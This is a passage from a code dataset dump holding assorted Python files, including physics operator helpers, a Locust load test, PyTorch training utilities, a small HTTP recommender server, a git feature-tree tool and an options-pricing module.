#flips 2*i-th bit in m\n\t\telif s == 1:\n\t\t\tnew_m = flipBit(m, 2*N - ((2*i)+2)) #flips 2*i+1-th bit in m\n\n\t\tif new_m < m:\t#occupancy in m is 1\n\t\t\tnew_state[m] = state[m]\n\n\treturn new_state\t\t\n\ndef cr(state, i, s, N):\n\t\"\"\"Application of c_i,s^dag on a given state (a linear superposition of |m>). Spin should be 0 for up and 1 for down.\"\"\"\n\tnew_state = {}\n\n\tfor basis_state in state:\n\t\tprefactor_cr, state_cr = fmulti_cr(basis_state, i, s, N)\n\n\t\tif state_cr != None:\n\n\t\t\ttry:\n\t\t\t\tnew_state[state_cr] += prefactor_cr * state[basis_state]\n\t\t\texcept KeyError:\n\t\t\t\tnew_state[state_cr] = prefactor_cr * state[basis_state]\n\n\treturn new_state\t\t\t\n\ndef an(state, i, s, N):\n\t\"\"\"Application of c_i,s on a given state (a linear superposition of |m>). Spin should be 0 for up and 1 for down.\"\"\"\n\tnew_state = {}\n\n\tfor basis_state in state:\n\t\tprefactor_an, state_an = fmulti_an(basis_state, i, s, N)\n\n\t\tif state_an != None:\n\n\t\t\ttry:\n\t\t\t\tnew_state[state_an] += prefactor_an * state[basis_state]\n\t\t\texcept KeyError:\n\t\t\t\tnew_state[state_an] = prefactor_an * state[basis_state]\n\n\treturn new_state\n\n# UTILITY ######################################################################\n# THESE FUNCTIONS ARE USED WHEN THE STATE IS REPRESENTED AS A DICTIONARY - THE KEY IS A STATE, ITS VALUE IS THE PROBABILITY AMPLITUDE.\n\ndef dict_sum(a, b):\n\t\"\"\"Calculates a sum of two states, represented by a dictionary.\"\"\"\n\tres = a\n\n\tfor key in b:\n\t\ttry:\n\t\t\tres[key] += b[key]\n\t\texcept KeyError:\n\t\t\tres[key] = b[key]\n\t\t\t\t\n\treturn res\n\ndef dict_list_sum(list_of_dicts):\n\t\"\"\"Sums a list of dictionaries.\"\"\"\n\tres = {}\n\tfor dictionary in list_of_dicts:\n\t\tres=dict_sum(res, dictionary)\n\n\treturn res\n\ndef dict_prod(num, dic):\n\t\"\"\"Multiply every value in the dictionary by a number. 
Used for multiplying numbers and states.\"\"\"\n\n\tfor i in dic:\n\t\tdic[i]*=num\n\n\treturn dic\n\ndef scalar_prod(dicta, dictb):\n\t\"\"\"Calculates a scalar product between two states, given as Python dictionaries.\"\"\"\n\tres=0\n\tfor a in dicta:\n\t\tfor b in dictb:\n\t\t\tif a==b:\n\t\t\t\tres+=dicta[a]*dictb[b]\n\n\treturn res\t\t\t\n\n\n","sub_path":"Mean field/Functions_fermionic_multiplication.py","file_name":"Functions_fermionic_multiplication.py","file_ext":"py","file_size_in_byte":5665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"539003458","text":"from locust import HttpUser, SequentialTaskSet, task, events, between\n\nfrom common.reports import save_stats, save_stats_history, save_stats_failure, notify_start_test\n\n\nclass UserBehavior(SequentialTaskSet):\n\n    @task(1)\n    def homePage(self):\n        with self.client.get(\"/site\", name = \"Home Page\", catch_response=True) as response:\n            if response.status_code != 200:\n                response.failure(\"Got wrong response code \" + str(response.status_code))\n                return\n            if response.content is None:\n                response.failure(\"Response is empty\")\n                return\n\nclass WebsiteUser(HttpUser):\n    tasks = [UserBehavior]\n    wait_time = between(5, 9)\n\n\n\nerrors = {}\n\n\n@events.request_failure.add_listener\ndef request_failure_handler(request_type, name, response_time, exception, **kwargs):\n    key_name = name.strip().lower().replace(\" \", \"_\")\n\n    if key_name not in errors:\n        errors[key_name] = {}\n        errors[key_name][\"count\"] = 0\n        errors[key_name][\"type\"] = request_type\n        errors[key_name][\"exception\"] = exception\n\n    errors[key_name][\"count\"] += 1\n\n\n@events.test_stop.add_listener\ndef on_quitting(**kwargs):\n    save_stats(scenery=\"site\")\n    save_stats_history(scenery=\"site\")\n    save_stats_failure(scenery=\"site\", errors=errors)\n    notify_start_test(scenery=\"site\")","sub_path":"stresstest/locustfiles/tasks/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"502832088","text":"import Pmf\n\ndef Mode(hist):\n    arr = AllModes(hist)\n    return arr[0][0]\n\ndef AllModes(hist):\n    arr = []\n    for x in hist.Values():\n        arr.append([x, hist.Freq(x)])\n    arr = sorted(arr, key = lambda x: x[1], reverse = True)\n    return arr\n","sub_path":"python/think_stats/Mode.py","file_name":"Mode.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"555522523","text":"import torch\nfrom torch.autograd import Variable\nfrom torch import nn\n\n\nclass DepthToSpace(nn.Module):\n\n    def __init__(self, block_size):\n        super().__init__()\n        self.bs = block_size\n\n    def forward(self, x):\n        N, C, H, W = x.size()\n        x = x.view(N, self.bs, self.bs, C // (self.bs ** 2),\n                   H, W)  # (N, bs, bs, C//bs^2, H, W)\n        # (N, C//bs^2, H, bs, W, bs)\n        x = x.permute(0, 3, 4, 1, 5, 2).contiguous()\n        x = x.view(N, C // (self.bs ** 2), H * self.bs, W *\n                   self.bs)  # (N, C//bs^2, H * bs, W * bs)\n        return x\n\n\nclass SpaceToDepth(nn.Module):\n\n    def __init__(self, block_size):\n        super().__init__()\n        self.bs = block_size\n\n    def forward(self, x):\n        N, C, H, W = x.size()\n        x = x.view(N, C, H // self.bs, self.bs, W // self.bs,\n                   self.bs)  # (N, C, H//bs, bs, W//bs, bs)\n        # (N, bs, bs, C, H//bs, W//bs)\n        x = x.permute(0, 3, 5, 1, 2, 4).contiguous()\n        x = x.view(N, C * (self.bs ** 2), H // self.bs, W //\n                   self.bs)  # (N, C*bs^2, H//bs, W//bs)\n        
return x\n\n\ndef print_gpu_info():\n print(torch.cuda.get_device_name(0))\n print('Memory Usage:')\n print('Allocated:', round(torch.cuda.memory_allocated(0)/1024**3, 1), 'GB')\n print('Cached: ', round(torch.cuda.memory_cached(0)/1024**3, 1), 'GB')\n\n\ndef descriptor_loss(descriptors, warped_descriptors, homographies, valid_mask, new_mode, device):\n\n def flat2mat(H):\n \"\"\"\n Converts a flattened homography transformation with shape `[1, 8]` to its\n corresponding homography matrix with shape `[1, 3, 3]`.\n \"\"\"\n return torch.reshape(torch.cat([H, torch.ones([H.shape[0], 1], device=device)], dim=1), [-1, 3, 3])\n\n def mat2flat(H):\n \"\"\"\n Converts an homography matrix with shape `[1, 3, 3]` to its corresponding flattened\n homography transformation with shape `[1, 8]`.\n \"\"\"\n H = torch.reshape(H, [-1, 9])\n return (H / H[:, 8:9])[:, :8]\n\n def invert_homography(H):\n \"\"\"\n Computes the inverse transformation for a flattened homography transformation.\n \"\"\"\n return mat2flat(torch.inverse(flat2mat(H)))\n\n def warp_points(points, homography):\n \"\"\"\n Warp a list of points with the INVERSE of the given homography.\n The inverse is used to be coherent with tf.contrib.image.transform\n\n Arguments:\n points: list of N points, shape (N, 2).\n homography: batched or not (shapes (B, 8) and (8,) respectively).\n\n Returns: a Tensor of shape (N, 2) or (B, N, 2) (depending on whether the homography\n is batched) containing the new coordinates of the warped points.\n \"\"\"\n\n H = torch.unsqueeze(homography, dim=0) if len(\n homography.shape) == 1 else homography\n points = torch.cat((points[:, -1:], points[:, :-1]), dim=1)\n\n # Get the points to the homogeneous format\n num_points = points.shape[0]\n points = points.type(torch.float32)\n\n points = torch.cat(\n [points, torch.ones([num_points, 1], device=device)], -1)\n H_inv = (flat2mat(invert_homography(H)))\n\n warped_points = torch.matmul(H_inv, points.transpose(0, 1))\n\n warped_points = warped_points[:, :2, :] / warped_points[:, 2:, :]\n warped_points = torch.transpose(warped_points, 1, 2)\n warped_points = torch.cat(\n (warped_points[:, :, -1:], warped_points[:, :, :-1]), dim=2)\n return warped_points[0] if homography.shape[0] == 1 else warped_points\n\n (batch_size, C, Hc, Wc) = descriptors.shape\n\n descriptors = descriptors.permute(0, 2, 3, 1)\n warped_descriptors = warped_descriptors.permute(0, 2, 3, 1)\n\n coord_cells = torch.stack(torch.meshgrid(torch.arange(\n Hc, device=device), torch.arange(Wc, device=device)), dim=2).type(torch.float32)\n coord_cells = coord_cells * 8 + 8 // 2 # (Hc, Wc, 2)\n\n warped_coord_cells = warp_points(\n torch.reshape(coord_cells, [-1, 2]), homographies)\n warped_coord_cells = torch.reshape(\n warped_coord_cells, [batch_size, Hc, Wc, 1, 1, 2])\n\n descriptors = torch.reshape(descriptors, [batch_size, Hc, Wc, 1, 1, -1])\n warped_descriptors = torch.reshape(\n warped_descriptors, [batch_size, 1, 1, Hc, Wc, -1])\n dot_product_desc = torch.sum(descriptors * warped_descriptors, -1)\n\n coord_cells = (torch.reshape(\n coord_cells, [1, 1, 1, Hc, Wc, 2])).type(torch.float)\n cell_distances = torch.norm(coord_cells - warped_coord_cells, dim=-1)\n\n positive_dist = torch.clamp(1. 
- dot_product_desc, min=0)\n negative_dist = torch.clamp(dot_product_desc - 0.2, min=0)\n\n if not new_mode:\n s = (cell_distances <= 8 - 0.5).type(torch.float)\n\n # Compute the loss\n loss = 250 * s * positive_dist + (1 - s) * negative_dist\n # Mask the pixels if bordering artifacts appear\n valid_mask = SpaceToDepth(8)(valid_mask)\n valid_mask = torch.prod(valid_mask, dim=1) # AND along the channel dim\n valid_mask = torch.reshape(valid_mask, [batch_size, 1, 1, Hc, Wc])\n normalization = torch.sum(valid_mask) * Hc * Wc\n loss = torch.sum(valid_mask * loss) / normalization\n return loss\n\n else:\n s_plus = (cell_distances <= 7.5).type(torch.float)\n #s_minus = (cell_distances <= 50).type(torch.float) - s_plus\n s_minus = 1. - s_plus\n\n positive_loss = torch.sum(s_plus*positive_dist)/torch.sum(s_plus)\n negative_loss = torch.sum(s_minus*negative_dist)/torch.sum(s_minus) * 100.\n loss = positive_loss + negative_loss\n #print(torch.sum(s_plus*dot_product_desc)/torch.sum(s_plus))\n #print(torch.sum(s_minus*dot_product_desc)/torch.sum(s_minus))\n #print(positive_loss)\n #print(negative_loss)\n #print('---------------------------')\n\n return loss\n\n\ndef get_labels(kmap, device):\n N, C, H, W = kmap.shape\n padding = Variable(torch.ones(\n N, 1, H, W, dtype=torch.float32, device=device))\n kmap = torch.cat((kmap*2, padding), 1)\n labels = torch.argmax(kmap, dim=1)\n return labels\n","sub_path":"training_helper.py","file_name":"training_helper.py","file_ext":"py","file_size_in_byte":6199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"472663786","text":"# import relevant libraries\n# system libraries\nimport time\nimport threading\n\n# loop counter\ncount = 0\n\n\ndef data_send():\n\tprint(\"DATA SEND\")\n\n\nwhile True:\n\t# sets up time variable needed to ensure loop happens once a second\n\t# rather than + 1 second\n\tstarttime = time.time()\n\t\n\t# prints counter to display progress of loop\n\tprint(\"\\nCount: \" + str(count))\n\t\n\t# receives status of signal from API, prints to terminal\n\tprint(\"DATA READ\")\n\t\n\tif count == 10:\n\t\t# creates a thread to allow the data send process to run in parallel\n\t\tdata_send_thread = threading.Thread(target = data_send)\n\t\t# starts the thread\n\t\tdata_send_thread.start()\n\t\t\n\t\t# resets count to start loop again\n\t\tcount = 0\n \n\t# increments loop\n\tcount += 1\n\t# sleeps process for the rest of the second\n\t# takes process time and removes it from the second, then sleeps for remaining time\n\ttime.sleep(1.0 - ((time.time() - starttime) % 60))\n","sub_path":"Submission-Code/Test-Functions/loop_b.py","file_name":"loop_b.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"355776650","text":"# Python 3 server example\r\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\r\nimport time\r\nimport urllib\r\nimport pickle\r\nfrom os import path\r\nimport os\r\n\r\n# import all user data class\r\nfrom data_wrangler import Data\r\n\r\nhostName = \"localhost\"\r\nserverPort = 8080\r\n\r\nALL_DATA = None\r\n\r\ndef parse_assist(s):\r\n s = s.replace('+',' ')\r\n s = s.replace('%2F','/')\r\n s = s.replace('%3F','?')\r\n return s\r\n \r\ndef init_profiler(usr):\r\n global ALL_DATA\r\n usr_info = ALL_DATA.USER_DATA[usr]\r\n\r\n usr_gender = usr_info['Gender']\r\n usr_height = float(int(usr_info['height'])) * 2.54 #cm\r\n usr_weight = float(int(usr_info['weight'])) / 2.2 #kg\r\n 
usr_age = float(int(usr_info['age']))\r\n\r\n usr_bmr = None\r\n if usr_gender == 'male':\r\n usr_bmr = 66.47 + (13.75 * usr_weight) + (5.003 * usr_height) - (6.755 * usr_age)\r\n else:\r\n usr_bmr = 655.1 +(9.563 * usr_weight) + (1.85 * usr_height) - (4.676 * usr_age)\r\n\r\n usr_info['bmr'] = usr_bmr\r\n\r\ndef get_demo_meals():\r\n meal1 = {\"Name\":\"Veggie Wrap\", \"Restaurant\":\"Zebra Lounge\",\"Cal\":300}\r\n meal2 = {\"Name\":\"Italian Sub\", \"Restaurant\":\"Zebra Lounge\",\"Cal\":550}\r\n meal3 = {\"Name\":\"Ham Sandwich\", \"Restaurant\":\"Ginger's Express\",\"Cal\":400}\r\n meal4 = {\"Name\":\"Fruit and Nut Salad\", \"Restaurant\":\"Ginger's Express\",\"Cal\":300}\r\n meal5 = {\"Name\":\"Chicken Ceasar Wrap\", \"Restaurant\":\"Au Bon Pain\",\"Cal\":480}\r\n return [meal1,meal2,meal3,meal4,meal5]\r\n\r\n\r\ndef init_recommender(usr):\r\n global ALL_DATA\r\n NDAT = ALL_DATA.NUTRITION_DATA\r\n\r\n usr_info = ALL_DATA.USER_DATA[usr]\r\n bmr = usr_info['bmr']\r\n caloric_matches = NDAT.loc[(NDAT['Cal'] >= bmr/7) & (NDAT['Cal'] <= bmr/4)]\r\n\r\n caloric_matches_random = caloric_matches.sample(4)\r\n usr_info['random meals'] = caloric_matches_random.T.to_dict().values()\r\n\r\n\r\nclass MyServer(BaseHTTPRequestHandler):\r\n def do_GET(self):\r\n \r\n global ALL_DATA\r\n global STATE\r\n\r\n print(\"REQUEST LINE: \",self.requestline)\r\n self.send_response(200)\r\n self.send_header(\"Content-type\", \"text/html\")\r\n self.end_headers()\r\n \r\n if (\"login\" in self.requestline):\r\n self.login_file = open(\"./loginPage.html\")\r\n self.login_file_lines = self.login_file.readlines()\r\n for line in self.login_file_lines:\r\n self.wfile.write(bytes(line, \"utf-8\"))\r\n\r\n elif (\"signup\" in self.requestline):\r\n self.signup_file = open(\"./signupPage.html\")\r\n self.signup_file_lines = self.signup_file.readlines()\r\n for line in self.signup_file_lines:\r\n self.wfile.write(bytes(line, \"utf-8\"))\r\n \r\n elif (\"dashboard\" in self.requestline):\r\n self.dasbrd_file = open(\"./usr_dashboard.html\")\r\n self.dasbrd_file_lines = self.dasbrd_file.readlines()\r\n for line in self.dasbrd_file_lines:\r\n self.wfile.write(bytes(line, \"utf-8\"))\r\n\r\n else: #main webpage\r\n if (ALL_DATA == None):\r\n ALL_DATA = Data()\r\n html_file = open(\"./mydesign1.html\")\r\n html_file_lines = html_file.readlines()\r\n for line in html_file_lines:\r\n self.wfile.write(bytes(line, \"utf-8\"))\r\n\r\n def do_POST(self):\r\n global ALL_DATA\r\n global STATE\r\n\r\n content_length = int(self.headers['Content-Length'])\r\n \r\n #body = self.rfile.read(content_length)\r\n #print(body)\r\n print(\"POST:\", self.requestline)\r\n if (\"setupPage\" in self.requestline): #sign up preceded this\r\n (input,username,pwd) = self.rfile.read(content_length).decode('utf-8').split('=')\r\n username = urllib.parse.unquote_plus(username)[:-6]\r\n pwd = urllib.parse.unquote_plus(pwd)\r\n print(\"username: \", username)\r\n print(\"pwd: \", pwd)\r\n ALL_DATA.add_usr(username, pwd)\r\n ALL_DATA.save()\r\n ALL_DATA.debug_print()\r\n STATE.curr_user = username\r\n \r\n self.send_response(200)\r\n self.send_header(\"Content-type\", \"text/html\")\r\n self.end_headers()\r\n \r\n self.setup_file = open(\"./setupPage.html\")\r\n self.setup_file_lines = self.setup_file.readlines()\r\n for line in self.setup_file_lines:\r\n self.wfile.write(bytes(line, \"utf-8\"))\r\n\r\n # elif (\"dashboardReturn\" in self.requestline) #IF HAVE TIME\r\n \r\n elif(\"dashboard\" in self.requestline): # setup preceded this\r\n print(\"goes 
into setupPage\")\r\n (v0,v1,v2,v3,v4,v5,v6,v7,v8) = self.rfile.read(content_length).decode('utf-8').split('=')\r\n replies = [v0,v1,v2,v3,v4,v5,v6,v7,v8]\r\n\r\n curr_reply, curr_prompt,next_prompt = None, None, None\r\n for i in range(len(replies)):\r\n v = replies[i]\r\n if i == 0:\r\n curr_prompt = replies[0]\r\n elif i < len(replies) - 1:\r\n curr_reply, next_prompt = v.split(\"&\")\r\n curr_prompt = parse_assist(curr_prompt)\r\n curr_reply = parse_assist(curr_reply)\r\n (ALL_DATA.USER_DATA[STATE.curr_user])[curr_prompt] = curr_reply\r\n curr_prompt = next_prompt\r\n else:\r\n curr_reply = parse_assist(replies[i])\r\n curr_prompt = parse_assist(curr_prompt)\r\n (ALL_DATA.USER_DATA[STATE.curr_user])[curr_prompt] = curr_reply\r\n\r\n #print(ALL_DATA.USER_DATA[STATE.curr_user])\r\n init_profiler(STATE.curr_user)\r\n \r\n self.send_response(200)\r\n self.send_header(\"Content-type\", \"text/html\")\r\n self.end_headers()\r\n \r\n html_file = open(\"./usr_dashboard.html\")\r\n html_file_lines = html_file.readlines()\r\n for line in html_file_lines:\r\n self.wfile.write(bytes(line, \"utf-8\")) #would need to change\r\n\r\n elif (\"feedback\" in self.requestline): #dashboard preceded this\r\n (v0,v1,v2,v3,v4,v5) = self.rfile.read(content_length).decode('utf-8').split('=')\r\n replies = [v0,v1,v2,v3,v4,v5]\r\n\r\n curr_reply, curr_prompt,next_prompt = None, None, None\r\n for i in range(len(replies)):\r\n v = replies[i]\r\n if i == 0:\r\n curr_prompt = replies[0]\r\n elif i < len(replies) - 1:\r\n curr_reply, next_prompt = v.split(\"&\")\r\n curr_prompt = parse_assist(curr_prompt)\r\n curr_reply = parse_assist(curr_reply)\r\n (ALL_DATA.USER_DATA[STATE.curr_user])[curr_prompt] = curr_reply\r\n curr_prompt = next_prompt\r\n else:\r\n curr_reply = parse_assist(replies[i])\r\n curr_prompt = parse_assist(curr_prompt)\r\n (ALL_DATA.USER_DATA[STATE.curr_user])[curr_prompt] = curr_reply\r\n\r\n #init_rec_demo()\r\n\r\n self.send_response(200)\r\n self.send_header(\"Content-type\", \"text/html\")\r\n self.end_headers()\r\n html_file = open(\"./feedback1.html\")\r\n html_file_lines = html_file.readlines()\r\n for line in html_file_lines:\r\n self.wfile.write(bytes(line, \"utf-8\"))\r\n \r\n #write variable part\r\n self.summarize_and_write(STATE.curr_user)\r\n\r\n html_file = open(\"./feedback2.html\")\r\n html_file_lines = html_file.readlines()\r\n for line in html_file_lines:\r\n self.wfile.write(bytes(line, \"utf-8\"))\r\n \r\n else:\r\n self.send_response(200)\r\n self.send_header(\"Content-type\", \"text/html\")\r\n self.end_headers()\r\n html_file = open(\"./mydesign1.html\")\r\n html_file_lines = html_file.readlines()\r\n for line in html_file_lines:\r\n self.wfile.write(bytes(line, \"utf-8\"))\r\n\r\n def summarize_and_write(self, usr):\r\n usr_info = ALL_DATA.USER_DATA[usr]\r\n #print(usr_info)\r\n usr_info['demo meals'] = get_demo_meals()\r\n \r\n # link interested responses to meals\r\n i = 1\r\n for meal_dict in usr_info['demo meals']:\r\n\r\n meal_dict['Interested ' + str(i)] = usr_info['Interested ' + str(i)]\r\n i += 1\r\n\r\n for k in usr_info.keys():\r\n if (not (k == 'demo meals')) and (not \"Interest\" in k) and (not (k == 'pwd')): \r\n strk = k\r\n if k == \"weightplan\": strk = \"Weight Plan\"\r\n elif k == 'weight': strk = \"Weight\"\r\n elif k == 'height': strk = \"Height\" \r\n elif k == \"What is your favorite genre of food?\": strk = \"Favorite Genre Of Food\"\r\n elif k == \"genre\": strk = \"Genre (other)\"\r\n elif k == \"genre\": strk = \"Genre (other)\"\r\n elif k == 
\"on/off campus?\": strk = \"On/Off Campus\"\r\n elif k == \"activity\": strk = \"Activity\"\r\n elif k == 'age': strk = 'Age'\r\n elif k == 'bmr': strk = 'BMR'\r\n info_line = ' ' + strk + ' ' + ' ' + str(usr_info[k]) + ' '\r\n self.wfile.write(bytes(info_line, 'utf-8'))\r\n \r\n\r\nclass State:\r\n def __init__(self):\r\n self.curr_user = \"\" #overwrite\r\n\r\nSTATE = State()\r\n\r\nif __name__ == \"__main__\": \r\n webServer = HTTPServer((hostName, serverPort), MyServer)\r\n print(\"Server started http://%s:%s\" % (hostName, serverPort))\r\n\r\n try:\r\n webServer.serve_forever()\r\n except KeyboardInterrupt:\r\n pass\r\n\r\n webServer.server_close()\r\n print(\"Server stopped.\")\r\n print(\"Server stopped.\")\r\n","sub_path":"pyweb1.py","file_name":"pyweb1.py","file_ext":"py","file_size_in_byte":9913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"53809940","text":"\n\nwith open('in.txt') as fh:\n s = fh.read().strip()\n \nfor i in range(14, len(s)):\n candidate = s[i-14:i] \n #print(candidate)\n if len(set(candidate)) == 14:\n print(i)\n break\n","sub_path":"2022/day06/prob2.py","file_name":"prob2.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"251771614","text":"from path import Path\nimport cv2\nfrom tqdm import tqdm\nimport numpy as np\nimport matplotlib.pyplot as plt\nroot =Path('/home/roit/aws/aprojects/xdr94_mono2/mc_test_gt')\nout_p = Path('./plasma_gt')\nout_p.mkdir_p()\nfiles = root.files()\n\n\ndef main():\n cnt=0\n for item in tqdm(files):\n\n img = cv2.imread(item)\n img =255- cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)\n img = img/np.mean(img)\n plt.imsave(out_p/item.stem+'.png',img,cmap='plasma')\n cnt+=1\n\n\n pass\n\nif __name__ == '__main__':\n main()","sub_path":"scripts/change_color_map.py","file_name":"change_color_map.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"373097138","text":"from git import Repo\nfrom anytree import Node, RenderTree\nimport os\nimport json\nimport click\n\nclass GoSPeLRepository:\n \"\"\"Represents a GoSPeL repository.\"\"\"\n\n def __init__(self):\n \"\"\"Initializes the data : create a GitPython object.\"\"\"\n self.currentPath = os.getcwd()\n self.repository = Repo(self.currentPath)\n\n def createFeature(self, name, optional):\n self.checkIfDependenciesFileExist()\n with open('dependencies.json', mode=\"r+\") as feedsjson:\n entry = json.load(feedsjson)\n entry[\"listOfChildFeatures\"].append({\"name\": name, \"isOptional\": str(optional)})\n feedsjson.seek(0)\n json.dump(entry, feedsjson)\n self.repository.git.add('dependencies.json')\n self.repository.git.commit(\"-m\", \"Added details for child feature \" + name + \" in feature \" + self.repository.active_branch.name)\n self.repository.git.branch(name)\n self.repository.git.checkout(name)\n os.remove(self.currentPath + '/dependencies.json')\n self.checkIfDependenciesFileExist()\n\n def mutex(self, name):\n click.echo('Creating mutex rule for product ' + self.repository.active_branch.name + ' and ' + name)\n self.checkIfDependenciesFileExist()\n with open('dependencies.json', mode=\"r+\") as feedsjson:\n entry = json.load(feedsjson)\n entry[\"mutex\"].append({\"feature\": name})\n feedsjson.seek(0)\n json.dump(entry, feedsjson)\n self.repository.git.add('dependencies.json')\n self.repository.git.commit(\"-m\", \"Added mutex rule for 
feature \" + name + \" in feature \" + self.repository.active_branch.name)\n\n def checkIfDependenciesFileExist(self):\n if (not os.path.isfile(self.currentPath + '/dependencies.json')):\n with open('dependencies.json', mode='w') as f:\n entry = json.loads('{\"currentFeature\": \"' + self.repository.active_branch.name + '\", \"listOfChildFeatures\": [], \"mutex\": [], \"require\": []}')\n json.dump(entry, f)\n f.close()\n self.repository.git.add('dependencies.json')\n self.repository.git.commit(\"-m\", \"Initial commit for product \" + self.repository.active_branch.name)\n\n def require(self, name):\n click.echo('Creating require rule for product ' + self.repository.active_branch.name + ' and ' + name)\n self.checkIfDependenciesFileExist()\n with open('dependencies.json', mode=\"r+\") as feedsjson:\n entry = json.load(feedsjson)\n entry[\"require\"].append({\"feature\": name})\n feedsjson.seek(0)\n json.dump(entry, feedsjson)\n self.repository.git.add('dependencies.json')\n self.repository.git.commit(\"-m\", \"Added require rule for feature \" + name + \" in feature \" + self.repository.active_branch.name)\n\n def show(self):\n features = []\n for head in self.repository.heads:\n features.append(Node(head.name))\n for feature in features:\n self.repository.git.checkout(feature.name)\n if (os.path.isfile(self.currentPath + '/dependencies.json')):\n with open('dependencies.json', mode=\"r+\") as f:\n entries = json.load(f)\n for entry in entries[\"listOfChildFeatures\"]:\n for currentNode in features:\n if (entry[\"name\"] == currentNode.name):\n feature.children = feature.children + (currentNode,)\n for feature in features:\n if (feature.name == \"master\"):\n from anytree.exporter import DotExporter\n DotExporter(feature).to_picture(\"visualisation.png\")\n os.system(\"open visualisation.png\")\n\n def delete(self, name): \n self.repository.git.checkout('master')\n click.echo('Deleting product ' + name)\n self.repository.git.branch('--delete', name)\n\n def edit(self, name):\n click.echo('Editing product ' + name)\n self.repository.git.checkout(name)","sub_path":"src/GospelRepository.py","file_name":"GospelRepository.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"101839940","text":"from theano import tensor\n\nfrom blocks.bricks import Brick\nfrom blocks.graph import ComputationGraph\nfrom tests.bricks import TestBrick\n\n\ndef test_application_graph_auxiliary_vars():\n X = tensor.matrix('X')\n Brick.lazy = True\n brick = TestBrick()\n Y = brick.access_application_call(X)\n graph = ComputationGraph(outputs=[Y])\n test_val_found = False\n for var in graph.variables:\n if var.name == 'test_val':\n test_val_found = True\n break\n assert test_val_found\n\n\ndef test_computation_graph():\n x = tensor.matrix('x')\n y = tensor.matrix('y')\n z = x + y\n a = z.copy()\n a.name = 'a'\n b = z.copy()\n b.name = 'b'\n r = tensor.matrix('r')\n\n cg = ComputationGraph([a, b])\n assert set(cg.inputs) == {x, y}\n assert set(cg.outputs) == {a, b}\n assert set(cg.variables) == {x, y, z, a, b}\n assert ComputationGraph(a).inputs == cg.inputs\n\n cg2 = cg.replace({z: r})\n assert set(cg2.inputs) == {r}\n assert set([v.name for v in cg2.outputs]) == {'a', 'b'}\n","sub_path":"tests/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"163183415","text":"import os 
\n\n\nprint(\"\")\nprint(\"┌───────────────────────────────────────────────────────────────┐\")\nprint(\"│ 🏥 Bienvenidos al sistema de historias clínicas del hospital 🏥 │\")\nprint(\"└───────────────────────────────────────────────────────────────┘\")\nprint(\"\")\nprint(\"\")\n\n\n# **********************\n# * VARIABLES GLOBALES *\n# **********************\n\nrunning = True\ndatabase = list()\n \n# **********************\n# * FUNCIONES *\n# **********************\n\ndef mainMenuResponse(userInput):\n if userInput == 1:\n name = input(\"ingrese el nombre del paciente ▶ \")\n history = input(\"ingrese la historia clinica del paciente ▶ \")\n paciente = {\"nombre\": name, \"historia\": history }\n database.append(paciente)\n elif userInput == 2:\n name = input(\"ingrese el nombre del paciente ▶ \")\n found = False\n for i in range(len(database)):\n if database[i][\"nombre\"] == name:\n found = True\n print(\"\")\n print(\"PACIENTE ENCONTRADO | H. CLINICA ▶ \", database[i][\"historia\"] )\n \n if found == False:\n print(\"\")\n print('Paciente no encontrado')\n\n elif userInput == 3:\n\n print(\" ** LISTADO DE PACIENTES ** \")\n\n for i in range(len(database)):\n # Rjust para crear una celda de tamaño 10\n # Para que las tabulaciones no aparezcan en espacios diferentes\n\n print(\"Nombre ▶ \".ljust(10), database[i][\"nombre\"], \"\\t\\t| Historial C. ▶ \".ljust(10), database[i][\"historia\"])\n\n \n\n\ndef response_validator(response, callback):\n numb_res = 0\n if response.isdigit():\n numb_res = int(response)\n if numb_res <= 1 and numb_res >= 4:\n numb_res = False\n\n if numb_res != 0:\n callback(numb_res)\n else:\n print(response)\n print(\"Valor no valido\")\n\n\ndef show_menu():\n print(\"\")\n print(\"\\t\\t 1 - Cargar paciente\")\n print(\"\\t\\t 2 - Buscar paciente\")\n print(\"\\t\\t 3 - Listar pacientes\")\n print(\"\\t\\t 4 - Salir\")\n print(\"\")\n res = input(\"INGRESE UNA OPCION ▶ \")\n os.system('clear')\n if res == '4':\n return False\n\n response_validator(res, mainMenuResponse)\n return res\n\n# **********************\n# * LOOP PRINCIPAL *\n# **********************\n\nwhile running:\n running = show_menu()\n ","sub_path":"src/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"586207255","text":"import numpy as np\nfrom scipy.stats import norm\nfrom scipy import optimize\n\n# undiscounted black option price\ndef black_option_price(f, # forward, double\n k, # strike, double\n t, # time to maturity, double\n v, # implied volatility, double\n c_or_p # call (1) or put (-1), integer\n ):\n\n d_1 = (np.log(f/k)+0.5*v*v*t)/(v*np.sqrt(t))\n d_2 = d_1 - v*np.sqrt(t)\n if c_or_p == 1 :\n return f * norm.cdf(d_1) - k * norm.cdf(d_2)\n elif c_or_p == -1 :\n return k * norm.cdf(-d_2) - f * norm.cdf(-d_1)\n else:\n raise ValueError('c_or_p is expected to be 1 for call or -1 for put.')\n\n#undiscounted black option vega\ndef black_option_vega(f, # forward, double\n k, # strike, double\n t, # time to maturity, double\n v # implied volatility, double\n ):\n\n d_1 = (np.log(f / 